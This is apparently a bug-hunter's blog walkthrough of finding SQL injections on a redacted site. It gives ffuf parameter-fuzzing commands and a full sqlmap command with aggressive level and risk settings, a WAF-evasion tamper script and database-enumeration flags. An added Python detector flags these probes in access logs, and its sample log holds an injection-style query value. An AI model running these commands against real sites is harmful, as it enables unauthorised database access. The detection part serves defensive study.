How I Found Multiple SQL Injections with FFUF and Sqlmap in a Few Minutes

Enumeration Phase:

uro is a tool for removing duplicate URLs from a collected list of URLs.

Getting Parameters:

ffuf -w lowercase-parameters.txt -u "https://redacted.org/searchProgressCommitment.php?FUZZ=5"
ffuf -w lowercase-parameters.txt -X POST -d "FUZZ=5" -u "https://redacted.org/searchProgressCommitment.php"

Exploitation:

sqlmap -r req3.txt -p commitment --force-ssl --level 5 --risk 3 --dbms="MYSQL" --hostname --current-user --current-db --dbs --tamper=between --no-cast

--level 5 --> level of tests to perform
--risk 3 --> risk of tests to perform
--dbms --> force the back-end DBMS value
--no-cast --> avoid cast-like statements while fetching data
--tamper --> tamper script (here "between") used to evade filters and WAFs
"--hostname --current-user --current-db --dbs" --> retrieve information about the database server, the current user, the current database and the available databases
#1st SQLi
#2nd SQLi
#3rd SQLi
#4th SQLi
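Added example from the defender's side (not code from the original post): a small Python detector that reads web-server access log lines and flags the two behaviours this walkthrough relies on, an ffuf parameter-name sweep against one endpoint (many distinct query-string names from one source) and parameter values shaped like the output of sqlmap's between tamper. The log lines, the IP addresses, the threshold of 20 names and both regexes are constructed assumptions for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Combined Log Format; only the fields the detector needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# sqlmap's 'between' tamper rewrites comparisons (a > b, a = b) into BETWEEN
# clauses, so a query-string value carrying one is a strong probe signal.
BETWEEN_RE = re.compile(r'\bBETWEEN\b\s+\S+\s+\bAND\b', re.IGNORECASE)

def parse_line(line):
    """Return ip, path and decoded (name, value) pairs, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m['url'])
    return m['ip'], url.path, parse_qsl(url.query, keep_blank_values=True)

def detect(lines, fuzz_threshold=20):
    """Flag 'param_fuzz' when one IP sends >= fuzz_threshold distinct parameter
    names to one path (what ffuf -w params.txt ... ?FUZZ=5 produces) and
    'sql_between' when a value looks like a BETWEEN-tampered injection probe."""
    names = defaultdict(set)  # (ip, path) -> distinct parameter names seen
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, params = rec
        for name, value in params:
            names[(ip, path)].add(name)
            if BETWEEN_RE.search(value):
                findings.append(('sql_between', ip, path, name))
    for (ip, path), seen in names.items():
        if len(seen) >= fuzz_threshold:
            findings.append(('param_fuzz', ip, path, len(seen)))
    return findings

# Constructed sample log: one source tries 24 guessed parameter names and then a
# BETWEEN-style value in the real parameter; a second source is benign traffic.
ATTACKER, PATH = '203.0.113.7', '/searchProgressCommitment.php'
GUESSES = ('id q s search page sort order limit offset lang user name type cat '
           'category filter view action status year month day key token').split()
SAMPLE_LOG = [f'{ATTACKER} - - [10/Oct/2023:13:55:{i:02d} +0000] "GET {PATH}?{n}=5 HTTP/1.1" 200 512'
              for i, n in enumerate(GUESSES)]
SAMPLE_LOG.append(f'{ATTACKER} - - [10/Oct/2023:13:56:01 +0000] '
                  f'"GET {PATH}?commitment=5%20AND%201%20BETWEEN%201%20AND%201 HTTP/1.1" 200 540')
SAMPLE_LOG.append('198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?q=hello HTTP/1.1" 200 8192')
```

Running detect(SAMPLE_LOG) yields one sql_between finding for the commitment parameter and one param_fuzz finding with 25 distinct names from the same source; the POST variant of the ffuf command leaves no query string in the access log, so catching it needs request-body logging or a WAF.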

Mahmoud Youssef

Cyber Security Researcher | Bug Hunter